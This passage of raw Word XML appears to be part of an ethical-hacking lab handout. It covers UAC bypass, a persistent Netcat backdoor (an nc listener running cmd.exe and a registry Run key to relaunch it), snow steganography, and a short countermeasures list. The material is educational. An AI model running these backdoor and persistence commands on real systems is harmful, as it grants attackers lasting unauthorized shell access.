          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Choose a suggested module (e.g.,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bypassuac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and run it to get a new, high-privilege shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BEC720" w14:textId="77777777" w:rsidR="006D621F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Lab 4: Creating a Persistent Backdoor with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans" w:cs="Google Sans"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EEA0AD6" w14:textId="77777777" w:rsidR="006D621F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Goal:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure access persists even after the initial exploit is closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AEA962" w14:textId="77777777" w:rsidR="006D621F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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA4CEF8" w14:textId="77777777" w:rsidR="006D621F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Target side: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Ldp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4444 -e cmd.exe (Windows listener that executes a shell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A4ED0B" w14:textId="77777777" w:rsidR="006D621F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Persistence:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add this command to the Windows Registry "Run" key: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\path\to\nc.exe -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Ldp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4444 -e cmd.exe".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392676AB" w14:textId="77777777" w:rsidR="006D621F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Attacker side:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Connect anytime using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[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Target_IP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] 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A35664" w14:textId="77777777" w:rsidR="006D621F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Lab 5: Steganography (The "Snow" Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C35ECC0" w14:textId="77777777" w:rsidR="006D62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Goal:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hide a secret message in plain sight within a text file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC88B52" w14:textId="77777777" w:rsidR="006D62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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17958F26" w14:textId="77777777" w:rsidR="006D621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Hide:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> snow -C -m "Secret Message" -p "password" input.txt stego.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA16DC9" w14:textId="77777777" w:rsidR="006D621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Observe:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open stego.txt. It looks identical to input.txt but contains hidden spaces/tabs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD8EB6" w14:textId="77777777" w:rsidR="006D621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Extract:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> snow -C -p "password" stego.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7058BC06" w14:textId="77777777" w:rsidR="006D621F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8. Countermeasures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17321F34" w14:textId="77777777" w:rsidR="006D621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MFA:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> The single best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defense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against password cracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E3CC74" w14:textId="77777777" w:rsidR="006D621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Audit Logs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use an external SIEM to store logs so an attacker cannot delete them locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562771AE" w14:textId="77777777" w:rsidR="006D621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Endpoint Detection (EDR):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Monitor for suspicious process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behavior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(like lsass.exe being dumped by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Mimikatz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4240FDA6" w14:textId="77777777" w:rsidR="006D621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Hardening:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disable unused services and protocols (e.g., LLMNR/NetBIOS) to prevent hash capture via Responder.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006D621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5437836-257A-4531-BBBB-BB47DED60133}"/>
  </w:font>
  <w:font w:name="Google Sans">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:embedBold r:id="rId2" w:fontKey="{7CDC3254-0209-4A46-B290-9FE99FF26DFD}"/>
  </w:font>
  <w:font w:name="Google Sans Text">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:embedRegular r:id="rId3" w:fontKey="{556526D3-6742-4DA6-89F5-EE5036998D9A}"/>
    <w:embedBold r:id="rId4" w:fontKey="{40EFD654-6D19-439C-946E-6C4B6F3AF7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63762E4-1417-484D-B499-CD7D8057F6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A15D86A-F2BE-4766-B193-046656C34C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74AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F3EED3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E404E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EC26B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F9910D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92F653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16A3951"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30BCE6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2181C21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC5A59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5F67D27"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C2CDF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3933C3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="142AE0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1046CF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DB282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64931DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC16B2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7CC30F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5FE1C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3077086"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="358A35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6303DFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F6EF3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6571556"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="739EEC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6EA0A0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91B2D0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E9D788D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B2271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AD132BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B94F3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D7F7949"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95D6AA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6F44045"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B93810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05812444">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="469976472">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="216825255">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="954017605">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1957591288">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1959870548">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1291128177">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="426853100">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1023046525">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="105581424">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1457604627">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="454254454">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1450663004">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="244189233">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="864632132">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="982153277">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="27220180">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1943681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21F"/>
    <w:rsid w:val="00084AE4"/>
    <w:rsid w:val="001D106A"/>
    <w:rsid w:val="002A5F05"/>
    <w:rsid w:val="002C085C"/>
    <w:rsid w:val="00371DEB"/>
    <w:rsid w:val="003B23B0"/>
    <w:rsid w:val="003D64A8"/>
    <w:rsid w:val="00481CA6"/>
    <w:rsid w:val="005E45F2"/>
    <w:rsid w:val="00650655"/>
    <w:rsid w:val="00671CAF"/>
    <w:rsid w:val="006723F3"/>
    <w:rsid w:val="006A6C6E"/>
    <w:rsid w:val="006D432B"/>
    <w:rsid w:val="006D621F"/>
    <w:rsid w:val="007154D4"/>
    <w:rsid w:val="007A26EB"/>
    <w:rsid w:val="007D6822"/>
    <w:rsid w:val="00803B66"/>
    <w:rsid w:val="00896588"/>
    <w:rsid w:val="008C60C7"/>
    <w:rsid w:val="008E3630"/>
    <w:rsid w:val="009359C3"/>
    <w:rsid w:val="009B6022"/>
    <w:rsid w:val="00A3689D"/>
    <w:rsid w:val="00A379A5"/>
    <w:rsid w:val="00AB51B0"/>
    <w:rsid w:val="00B35BD5"/>
    <w:rsid w:val="00BE1AB6"/>
    <w:rsid w:val="00C12DAF"/>
    <w:rsid w:val="00CF4C3D"/>
    <w:rsid w:val="00CF5D96"/>
    <w:rsid w:val="00D304A5"/>
    <w:rsid w:val="00D631EC"/>
    <w:rsid w:val="00D66E4A"/>
    <w:rsid w:val="00E04FDF"/>
    <w:rsid w:val="00F236BE"/>
    <w:rsid w:val="00F4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41007"/>
  <w15:docId w15:val="{4DDCAC14-E46F-444B-AB21-9F8DCA3E7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6723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3F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723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piNkLNqDto4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1460</TotalTime>
  <Pages>7</Pages>
  <Words>1178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raghu prasad konandur</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-17T06:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-18T06:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>